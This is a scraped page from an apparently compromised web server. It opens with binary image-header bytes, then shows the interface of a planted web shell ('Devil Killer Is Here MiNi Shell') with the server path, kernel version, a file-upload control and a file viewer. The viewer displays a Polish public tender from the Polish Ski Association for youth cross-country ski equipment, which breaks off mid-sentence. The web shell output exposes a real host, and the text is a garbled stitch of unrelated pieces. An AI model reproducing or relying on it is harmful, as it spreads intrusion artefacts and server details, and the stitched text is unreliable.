JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231020/0045410301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA SPRZĘTU SPORTOWEGO W RAMACH REALIZACJI PROGRAMU &#34;MŁODY NARCIARZ 2023&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLSKI ZWIĄZEK NARCIARSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000866573</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">MIESZCZAŃSKA 18/3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-313</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 260 99 70</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">office@pzn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pzn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> POLSKI ZWIĄZEK SPORTOWY </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> SPORT </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA SPRZĘTU SPORTOWEGO W RAMACH REALIZACJI PROGRAMU &#34;MŁODY NARCIARZ 2023&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3403aafe-6cda-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00454103</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3403aafe-6cda-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3403aafe-6cda-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się za pomocą bezpłatnej Platformy e-Zamówienia https://ezamowienia.gov.pl) oraz - w zakresie dopuszczonym SWZ – poczty elektronicznej (office@pzn.pl). Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje dotyczące zakładania kont oraz zasady korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny pod adresem: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”: https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ Przeglądanie i pobieranie publicznej treści dokumentacji<br/>postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. Informacje dotyczące sposobu komunikacji w ramach postępowania na Platformie e-Zamówienia zawiera instrukcja „Komunikacja w postępowaniu” udostępniona na Platformie e-Zamówienia: https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf Do korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie konieczne jest posiadanie konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowanie się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” w celu zadawania pytań dotyczących treści dokumentów zamówienia wystarczy posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wysłane i odebrane przez Wykonawcę wiadomości w postępowaniu widoczne są po zalogowaniu w podglądzie postępowania, w zakładce „Komunikacja”. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” dostępnych na Platformie e-Zamówienia wynosi 150 MB (dotyczy plików przesyłanych jako załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. W przypadku problemów technicznych i awarii funkcjonowania Platformy e-Zamówienia można korzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”:<br/>https://ezamowienia.gov.pl/soz/latest-faq Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej wynosi 25 MB. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w postępowaniu określa § 2 rozporządzenia, o którym mowa w pkt 10.3. SWZ. Wśród dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx, .odt. Za datę przekazania dokumentów, informacji i oświadczeń oraz ich cyfrowych odwzorowań przyjmuje się datę ich wpływu na Platformę e-Zamówienia lub datę i godzinę wpływu na serwer pocztowy Zamawiającego. Wszelkie informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz.U. z 2022 r. poz. 1233), które zostaną przez Wykonawcę zastrzeżone jako tajemnica przedsiębiorstwa, Wykonawca przekazuje Zamawiającemu w wydzielonym pliku odpowiednio oznaczonym opisem „Tajemnica przedsiębiorstwa”, w celu utrzymania w poufności tych informacji. Szczegółowe informacje dotyczące tajemnicy przedsiębiorstwa oraz udostępniania dokumentów zostały opisane w pkt. 6 SWZ. Inne dokumenty i oświadczenia składane w postępowaniu, w tym wymienione w pkt 9.2. SWZ, Wykonawca składa za pośrednictwem „Formularza do komunikacji” dostępnego na Platformie e-Zamówienia lub - w zakresie dopuszczonym SWZ także - na adres poczty elektronicznej wskazany w pkt 1. SWZ, w formie określonej odpowiednio w pkt 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wykonawca jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych wynikających z Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) – w dalszej części „RODO”. Na Wykonawcy w szczególności spoczywa obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4). Ponadto Wykonawca zobowiązany jest wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem Wykonawcy w postępowaniu, Zamawiający wymaga złożenia wraz z ofertą przez Wykonawcę / przez osobno każdego z Wykonawców wspólnie ubiegających się o zawarcie umowy oświadczenia o wypełnieniu obowiązków informacyjnych, przewidzianych w art. 13 lub art. 14 RODO, zgodnie z treścią załącznika nr 4 do SWZ. Zamawiający informuje o przetwarzaniu danych osobowych, w związku z realizacją niniejszego zamówienia. Szczegółowa klauzula informacyjna stanowi załącznik nr 5 do SWZ. Na podstawie art. 18 ust. 6 Pzp, Zamawiający zastrzega, że będzie udostępniał dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX Pzp, do upływu terminu na ich wniesienie.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowa klauzula informacyjna stanowi załącznik nr 5 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZN/4/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 416504,07 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> SPRZĘT BIEGOWY ZIMOWY wg. poniższego zestawienia, posiadający oznakowanie w postaci naklejek z logotypem Ministerstwa Sportu i Turystyki (naklejki zostaną dostarczone przez Zamawiającego, Wykonawca jest zobowiązany je umieścić na produktach wg szczegółowych wytycznych, które zostaną przekazane Wykonawcy przez Zamawiającego - orientacyjna lokalizacja w opisach poniżej). Sprzęt należy przygotować w odpowiednich paczkach zawierających pakiety dla poszczególnych klubów sportowych - wg szczegółowych wytycznych (ilości i rozmiary), które zostaną przekazane Dostawcy przez Zamawiającego (dostawa będzie realizowana przez Dostawcę bezpośrednio do klubów sportowych wskazanych przez Zamawiającego).<br/>Łączna ilość – 329 kompletów, w tym:<br/><br/>a)	Narty do narciarstwa biegowego (styl klasyczny) wraz z wiązaniami.<br/>Sprzęt specjalistyczny odpowiedni dla średniozaawansowanych młodych biegaczy narciarskich. <br/><br/>Narty na ślizgu z wymienną wkładką na poziomie zawodniczym, wyposażone w wysokiej jakości drewniany rdzeń o niskiej gęstości lub tworzywa sztucznego zapewniającego podobne właściwości dotyczące sztywności narty zapewniające stabilność narty w każdych warunkach. Przykładowym tworzywem jest włókno bazaltowe lub włókno dwukierunkowe szklane. Nie dopuszcza się włókna jednokierunkowego szklanego ze względu na znaczne obniżenie sztywności narty. wkładka w strefie odbicia zapewniająca kopnięcie i poślizg w każdych warunkach. Narty kompatybilne z systemem wiązań NNN, który zapewnia łatwość montażu, dobrą stabilność i czucie narty. Wiązania typu NNN regulowane (przesuwanie) są w sposób bez narzędziowy lub narzędziowy.<br/><br/>Wiązanie do nart biegowych pasujące do wszystkich butów biegowych z podeszwami typu NNN oraz systemów kompatybilnych. Wiązania typu NNN zapewniające łatwy i szybki montaż na płycie (bez użycia narzędzi) oraz łatwe przesuwanie przód/tył pozwalające na regulację środka ciężkości w celu dostosowania zachowania nart do różnych warunków śniegowych lub preferencji zawodnika. Miękkie gumki w przedniej części wiązania (fleksy) z możliwością wymiany bez użycia narzędzi. <br/>Zamawiający akceptuje wszystkie systemy przesuwne w wiązaniach nart biegowych. Zamawiający preferuje wiązania przesuwne jak i nieprzesuwne do długości narty 167 cm, natomiast od długości narty 167 cm dopuszcza tylko przesuwne. System przesuwania może być także poprzez podważenie kluczykiem.<br/><br/>ILOŚĆ - 171 par (w tym: 136 cm x 2 pary; 146 cm x 15 par; 156 cm x 38 par; 166 cm x 25 par; <br/>176 cm x 47 par; 186 cm x 43 pary; 196 cm x 1 para)<br/><br/>Uwaga: Długości nart mogą być +/- (plus/minus) 3 cm od w/w. <br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: na narcie, powyżej zapięcia biegowego.<br/><br/>b)	Narty do narciarstwa biegowego (styl dowolny) wraz z wiązaniami<br/>Sprzęt specjalistyczny odpowiedni dla średniozaawansowanych młodych biegaczy narciarskich. <br/><br/>Narty wyposażone w wysokiej jakości drewniany rdzeń o niskiej gęstości lub tworzywa sztucznego zapewniającego podobne właściwości dotyczące sztywności narty zapewniające stabilność narty w każdych warunkach. Przykładowym tworzywem jest włókno bazaltowe lub włókno dwukierunkowe szklane. Nie dopuszcza się włókna jednokierunkowego szklanego ze względu na znaczne obniżenie sztywności narty. Narty kompatybilne z systemem wiązań NNN, który zapewnia łatwość montażu, dobrą stabilność i czucie narty. Wiązania typu NNN regulowane (przesuwanie) są w sposób bez narzędziowy lub narzędziowy. Ślizg narty wyposażony w strukturę fabryczną.<br/><br/>Wiązanie do nart biegowych pasujące do wszystkich butów biegowych z podeszwami typu NNN oraz systemów kompatybilnych. Wiązania typu NNN zapewniające łatwy i szybki montaż na płycie (bez użycia narzędzi) oraz łatwe przesuwanie przód/tył pozwalające na regulację środka ciężkości w celu dostosowania zachowania nart do różnych warunków śniegowych lub preferencji zawodnika. Twarde gumki w przedniej części wiązania (fleksy) z możliwością wymiany bez użycia narzędzi.<br/>Zamawiający akceptuje wszystkie systemy przesuwne w wiązaniach nart biegowych.<br/>System przesuwania może być także poprzez podważenie kluczykiem.<br/><br/>ILOŚĆ - 158 par (w tym: 133 cm x 13 par; 143 cm x 30 par; 153 cm x 53 pary; 163 cm x 56 par; <br/>173 cm x 2 pary; 183 cm x 4 pary)<br/><br/>Uwaga: Długości nart mogą być +/- (plus/minus) 3 cm od w/w. <br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: na narcie, powyżej zapięcia biegowego.<br/><br/><br/>c)	Buty zawodnicze do narciarstwa biegowego (uniwersalne).<br/><br/>Ciepły, łatwy w obsłudze but typu combi junior (skiathlon) przeznaczony do jazdy techniką łyżwową i klasyczną. Zewnętrzny górny mankiet z wolnym zawiasem przegubowym, zapewniający ścisłe dopasowanie do stopy stawu skokowego w celu utrzymania go w prawidłowym ustawieniu i umożliwiający zapewnienie ciepła i komfortu jazdy na nartorolkach i nartach.<br/>System łatwego sznurowania buta ma zapewnić młodym narciarzom sprawne zakładanie oraz ściąganie butów a konstrukcja umożliwia do prowadzenia treningu zarówno techniką łyżwową jak i klasyczną.<br/>ILOŚĆ - 329 par (w tym: nr 30 x 1 para; nr 31 x 1 para; nr 32 x 8 par; nr 33 x 11 par; <br/>nr 34 x 18 par; nr 35 x 24 pary; nr 36 x 40 par; nr 37 x 55 par; nr 38 x 53 pary; nr 39 x 45 par; <br/>nr 40 x 35 par; nr 41 x 28 par; nr 42 x 4 pary; nr 43 x 4 pary; nr 44 x 2 pary).<br/><br/>Uwaga: Dopuszcza się rozmiary butów biegowych w ogłoszonych rozmiarach plus 1/3 lub 2/3 <br/>w rozmiarach EU.<br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: przód buta (na zapięciu).<br/><br/>d)	Kije narciarskie do narciarstwa biegowego.<br/><br/>Kije do narciarstwa biegowego o lekkiej i wytrzymałej konstrukcji, w 20%- 100% włókna węglowego lub wykonane w 100% z aluminium, posiadające uchwyt z tworzywa naturalnego np. korkowego lub sztucznego oraz pasek z pętelką dla bezpiecznego i wygodnego poczucia. Kije mogą być wykonane z innego materiału tworzywowego zapewniającego zbliżone właściwości związane z twardością i wagą (wytrzymałe i lekkie) jak powyżej np. z tworzywa kompozytowego typu fiberglass z uchwytem korkowym. Preferowany jest grot uniwersalny widiowy zarówno na asfalt i śnieg.<br/><br/>ILOŚĆ - 329 par (w tym: 80 cm x 1 para; 85 cm x 1 para; 90 cm x 1 para; 95 cm x 5 par; <br/>100 cm x 6 par; 105 cm x 13 par; 110 cm x 24 pary; 115 cm x 31 par; 120 cm x 40 par; <br/>125 cm x 50 par; 130 cm x 154 pary; 140 cm x 3 pary)<br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: poniżej rękojeści, z przodu kija. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 291552,85 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37410000-5 - Sprzęt sportowy do uprawiania sportów na wolnym powietrzu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37411120-9 - Narty</p> <p class="mb-0">37411130-2 - Kijki narciarskie</p> <p class="mb-0">18821100-1 - Buty do biegów narciarskich</p> <p class="mb-0">37411000-2 - Sprzęt zimowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został szczegółowo opisany w pkt 17. SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> SPRZĘT BIEGOWY LETNI wg. poniższego zestawienia, posiadający oznakowanie w postaci naklejek z logotypem Ministerstwa Sportu i Turystyki (naklejki zostaną dostarczone przez Zamawiającego, Wykonawca jest zobowiązany je umieścić na produktach wg szczegółowych wytycznych, które zostaną przekazane Wykonawcy przez Zamawiającego - orientacyjna lokalizacja w opisach poniżej). Sprzęt należy przygotować w odpowiednich paczkach zawierających pakiety dla poszczególnych klubów sportowych - wg szczegółowych wytycznych (ilości i rozmiary), które zostaną przekazane Dostawcy przez Zamawiającego (dostawa będzie realizowana przez Dostawcę bezpośrednio do klubów sportowych wskazanych przez Zamawiającego).<br/>Łączna ilość – 141 kompletów, w tym:<br/><br/>a)	Nartorolki wraz z wiązaniami.<br/>Sprzęt specjalistyczny odpowiedni dla średniozaawansowanych młodych biegaczy narciarskich. <br/><br/>Nartorolki juniorskie do stylu dowolnego. Rama wykonana z aluminium o długości całkowitej 550 mm. Profil ramy o wymiarze 55x32mm. Średnica kół zgodnie z przepisami FIS i nieprzekraczająca 100mm (ICR Art. 396.2.3) Koła wykonane z gumy naturalnej o szerokości 29mm, zwulkanizowane na feldze aluminiowej szprychowanej i wysokości nalewki 16mm. Prędkość kół średnio-szybka. Preferowane są koła o mniejszej średnicy niż 100mm ze względu na zachowanie lepszej stabilności dla młodych zawodników np. do 50mm.<br/>Jeżeli powyższa specyfikacja wskazywałaby w odniesieniu do materiałów, urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, to zgodnie z ustawą Prawo zamówień publicznych Zamawiający dopuszcza zaoferowanie materiałów /urządzeń/ 